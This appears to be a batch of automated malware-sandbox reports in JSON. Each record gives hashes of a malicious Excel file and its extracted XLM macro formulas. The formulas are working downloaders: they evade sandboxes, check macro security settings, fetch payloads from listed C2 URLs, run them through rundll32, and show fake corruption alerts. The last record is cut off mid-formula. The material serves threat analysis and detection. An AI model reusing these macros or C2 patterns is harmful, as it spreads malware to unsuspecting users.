{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d890cd86a04ead18a06751848ff98e362e9d92ce680dee3189a0eecf3e29a26"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d890cd86a04ead18a06751848ff98e362e9d92ce680dee3189a0eecf3e29a26","filesize":167936,"md5":"5fb65e94e890d163d92415622e01b121","sha1":"4b41c647ab37a9c2fd042a8f8a552815d9b873d3","sha256":"6d890cd86a04ead18a06751848ff98e362e9d92ce680dee3189a0eecf3e29a26","sha512":"f5e006a4715b0928d35b1eaa58b720c210b91e5a691aafcdfa22cc3d1a9f20159a509cab324931d03a4430197143acbbedee66a38ff3967b01957d1ba6509a05","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d890cd86a04ead18a06751848ff98e362e9d92ce680dee3189a0eecf3e29a26.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sZPsSe20Mu\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d93c92bc0fbb7890d60112215fb668e9c482d57c0022558585410c5c085ec3f"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d93c92bc0fbb7890d60112215fb668e9c482d57c0022558585410c5c085ec3f","filesize":185344,"md5":"bf6b093961e79316f68ba86c3b8183ca","sha1":"cf82d06e5d9bd35e1bf73ed8a8801c00c62f3947","sha256":"6d93c92bc0fbb7890d60112215fb668e9c482d57c0022558585410c5c085ec3f","sha512":"75afacc61852926a31fac0049ec7f1f3344f3e3226bdb3d63e926f88c53027a801d8d8a3e7411ad2ebeb49d409015cfa6f7b5f42e1cd1aa50b68e854652a5574","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d93c92bc0fbb7890d60112215fb668e9c482d57c0022558585410c5c085ec3f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6d9e98e9684e4abb8f259d90f7b1e198b7dac39f5e8b947af036230b3afb7641"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6d9e98e9684e4abb8f259d90f7b1e198b7dac39f5e8b947af036230b3afb7641","filesize":214528,"md5":"4b2c269355fb597f50554d4dccbc7429","sha1":"904ccf50ad2226f23dec495a0f520b0761bca50d","sha256":"6d9e98e9684e4abb8f259d90f7b1e198b7dac39f5e8b947af036230b3afb7641","sha512":"98a162678b8baf3b416ea50a536da693b65558f2cd4550a403c9ea42df6b62f06c06d11e3809e3acf001cb633d02eebf799dac6e541cc9b7909419244619a342","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6d9e98e9684e4abb8f259d90f7b1e198b7dac39f5e8b947af036230b3afb7641.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AP3vAMOvm0\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6dc05ff4c5322851bfa21af672cb21bdbc07a075b04942c05f210a8f20a8c77e"},"analysis":{"reported":"2020-04-09T16:16:55Z","score":10},"files":[{"filename":"6dc05ff4c5322851bfa21af672cb21bdbc07a075b04942c05f210a8f20a8c77e","filesize":110592,"md5":"ff27009a212ddf32019facf3495bea6b","sha1":"53500667cca72102bb8da6418d82336f1e317458","sha256":"6dc05ff4c5322851bfa21af672cb21bdbc07a075b04942c05f210a8f20a8c77e","sha512":"69b214821a12384647d2eeff28eed48c9e9e885a565799543748d82786fe41fc6366e51549cc01fcc73f36ee8006864301efccecc48bc820597fcfe78afe9192","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6dc05ff4c5322851bfa21af672cb21bdbc07a075b04942c05f210a8f20a8c77e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HALT()\nRETURN()\nRETURN()\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6df8feeb3a855e80c18eb88c084a4e0c0823b888d334fde31b75072ef5f29c95"},"analysis":{"reported":"2020-04-09T16:16:56Z","score":10},"files":[{"filename":"6df8feeb3a855e80c18eb88c084a4e0c0823b888d334fde31b75072ef5f29c95","filesize":161280,"md5":"f73fc5b2a70124dc10ea5f4ea7e7bfcb","sha1":"7c7a605413cb613574e436748dcc5953d6b838d1","sha256":"6df8feeb3a855e80c18eb88c084a4e0c0823b888d334fde31b75072ef5f29c95","sha512":"1dda20c01e14021182b814add4d481c89b90ac5a48baf20a725951b6f40824ed38491ab8f70f8e418424c0e878a1ae9ac9c7276b0a8e282af1161f76b893ad89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6df8feeb3a855e80c18eb88c084a4e0c0823b888d334fde31b75072ef5f29c95.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ltwyIWaGRT\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6dfa63a73eb6945d583f12e030e381078f03773f680eadf260927908af0b3816"},"analysis":{"reported":"2020-04-09T16:16:56Z","score":10},"files":[{"filename":"6dfa63a73eb6945d583f12e030e381078f03773f680eadf260927908af0b3816","filesize":214528,"md5":"edbe4d3de2a4a99e0e1b77d0a40584db","sha1":"7aaa315f0a8a1e410bbd7bbe30065435ccedcf1e","sha256":"6dfa63a73eb6945d583f12e030e381078f03773f680eadf260927908af0b3816","sha512":"2081585b204783259eddd36604385177a18d79ab5919503a4ff3585c0da3cfc50acf6e45f82258fd6eca1aee2ac6bc14e8c3a056dfcc875b77120cbe47666968","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6dfa63a73eb6945d583f12e030e381078f03773f680eadf260927908af0b3816.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HuIAD6Olx4\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6dfd45929eaf597a9909e172b967a5693d95c999785aced9d412b14aee624530"},"analysis":{"reported":"2020-04-09T16:16:56Z","score":10},"files":[{"filename":"6dfd45929eaf597a9909e172b967a5693d95c999785aced9d412b14aee624530","filesize":168960,"md5":"761abd5b9654689e2c868a6b93330d3f","sha1":"5cbb0a156461cdf6cd1b53a3ac9276c934c28874","sha256":"6dfd45929eaf597a9909e172b967a5693d95c999785aced9d412b14aee624530","sha512":"ddab976f987366106c2db0e96095a9bb2748d7f564a66cf5210c49f181546bf2e62cc927d6104eee9cf4e21d5c5cf97260afa9b251cd491d190d3a0f114628b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6dfd45929eaf597a9909e172b967a5693d95c999785aced9d412b14aee624530.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YIIlMETmCf\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e0703ac2a0973dfc78a098f12deabef00c1bae2d86039038b0c55fb20ff7b87"},"analysis":{"reported":"2020-04-09T16:16:56Z","score":10},"files":[{"filename":"6e0703ac2a0973dfc78a098f12deabef00c1bae2d86039038b0c55fb20ff7b87","filesize":214016,"md5":"50f00882078a128eb3ac5a1096543bcf","sha1":"144d462177eeacb77ffa7fc53654b1d73fc72de6","sha256":"6e0703ac2a0973dfc78a098f12deabef00c1bae2d86039038b0c55fb20ff7b87","sha512":"53cbb915d82eba9786bdd873ecfbed63a305980ddba6986d1e0fd394b8b255cb39f45babe98709fd399e1b7fff74ced802296d3d97131f8ff26ea1d301c1a6a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e0703ac2a0973dfc78a098f12deabef00c1bae2d86039038b0c55fb20ff7b87.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Oz9GbroG6s\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e1a1d22966454c73918e5cb3ceb83ce1ab9f9012608708f90e4c3d7ded3e6d6"},"analysis":{"reported":"2020-04-09T16:16:56Z","score":10},"files":[{"filename":"6e1a1d22966454c73918e5cb3ceb83ce1ab9f9012608708f90e4c3d7ded3e6d6","filesize":113664,"md5":"cc932b6a24734cdcbb3d55e3f1836214","sha1":"580ff5dd0f25ff8657e24a8aa0371da0890fa979","sha256":"6e1a1d22966454c73918e5cb3ceb83ce1ab9f9012608708f90e4c3d7ded3e6d6","sha512":"88707f51806650fcac46ae5db39c8ebfd16eac20bdaf863e3570ed0a128b0eca758370c0fd00360129d046ea4d2bfa4293e944d82bb86ca6ed7480a4f0317c3c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e1a1d22966454c73918e5cb3ceb83ce1ab9f9012608708f90e4c3d7ded3e6d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"paPJXoy8xB\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e21b012f2c7455fa76e37f3fd2d5f792b9c5a3039493e466a8b2ebf81bdae9c"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e21b012f2c7455fa76e37f3fd2d5f792b9c5a3039493e466a8b2ebf81bdae9c","filesize":221696,"md5":"5cb090cf931f6e28f71dbe80eeabe55b","sha1":"daa7f4ebf9f1ee2f8510d5c87ddb4f477caad088","sha256":"6e21b012f2c7455fa76e37f3fd2d5f792b9c5a3039493e466a8b2ebf81bdae9c","sha512":"0e302261442ca19b6a38a4f3b081cf96b1a28b0d6fd7a829e0067456e499f4b2789ff13c3ca3e5499bc9214bfc6ac753f974a4b0d87240caa0c5f416ef91dd2a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e21b012f2c7455fa76e37f3fd2d5f792b9c5a3039493e466a8b2ebf81bdae9c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1c3XkFqti4\",TRUE)\nGOTO(IF(GET.WORKSPACE(19),,CLOSE(TRUE)))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\nCLOSE(FALSE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e2ad3f589a330bab12879bd3d569113e303bc3fadd34a72a512aca362b5a921"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e2ad3f589a330bab12879bd3d569113e303bc3fadd34a72a512aca362b5a921","filesize":185344,"md5":"87d27fa572ebc974f445651025d2b15b","sha1":"7012d90ad6195fe060c61de2c190a856baf75685","sha256":"6e2ad3f589a330bab12879bd3d569113e303bc3fadd34a72a512aca362b5a921","sha512":"798f420e02fdaf0fbb6bdeec8e1f6235d6d2361762f27c29b29b18d61385d8508ebf61898a0d8575fdf71d2b35f72ee3f6bb37df759366cea1829e724b86b00a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e2ad3f589a330bab12879bd3d569113e303bc3fadd34a72a512aca362b5a921.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e311e46e5deab3c1e107606f3f5f91e249964a226feafe54db6683f8fb35fbe"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e311e46e5deab3c1e107606f3f5f91e249964a226feafe54db6683f8fb35fbe","filesize":116224,"md5":"4cff8a780a96fa8d12ef763e889c91cf","sha1":"74f09d685e457a9a180e01c1079c5b55fae99426","sha256":"6e311e46e5deab3c1e107606f3f5f91e249964a226feafe54db6683f8fb35fbe","sha512":"4ac491a9c151682ca976a18987107a0afe436ca755dfa9b51cb270f51eb9374254a08b6b7b46e384969bf52a2ed0bc3e6352504da148b9652bb9ef1055fe4c12","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e311e46e5deab3c1e107606f3f5f91e249964a226feafe54db6683f8fb35fbe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LepYc7dttx\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e4fa080142ce29789397a44836d89634c9586d48fcf437a6fef936c1cca4094"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e4fa080142ce29789397a44836d89634c9586d48fcf437a6fef936c1cca4094","filesize":167936,"md5":"57f3f8cab9ab198047f7873978515889","sha1":"f1744389a05e0e58b9e60112cf9610ff6a826f30","sha256":"6e4fa080142ce29789397a44836d89634c9586d48fcf437a6fef936c1cca4094","sha512":"d8e0e00b3e2b5d722232e4607cc44bf7fcb02118c9c8cdcaeb35b92dfcc86b59ddfe88c2721ad120c7068208d38a9f3a86ed80d3c5d5876149b6c9a36a690c9f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e4fa080142ce29789397a44836d89634c9586d48fcf437a6fef936c1cca4094.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aOyueOVXp6\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e63fd5049b5f70cee55cdeeeb0ed85237478f67323c9bae910929d1b592897d"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e63fd5049b5f70cee55cdeeeb0ed85237478f67323c9bae910929d1b592897d","filesize":116224,"md5":"9f9a6d29b3b93e429a67b591a9e5dfa6","sha1":"1029acf408df053f79c41bb3ce74b6ccef9b02f1","sha256":"6e63fd5049b5f70cee55cdeeeb0ed85237478f67323c9bae910929d1b592897d","sha512":"8142f2360bb315800dbd698784853181263eccd9002b7fa34456d1055a5eb724dea27be4a6e5e784b013bfafeff693887440fd53bda7777ea1f2d8c5f8f120e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e63fd5049b5f70cee55cdeeeb0ed85237478f67323c9bae910929d1b592897d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, 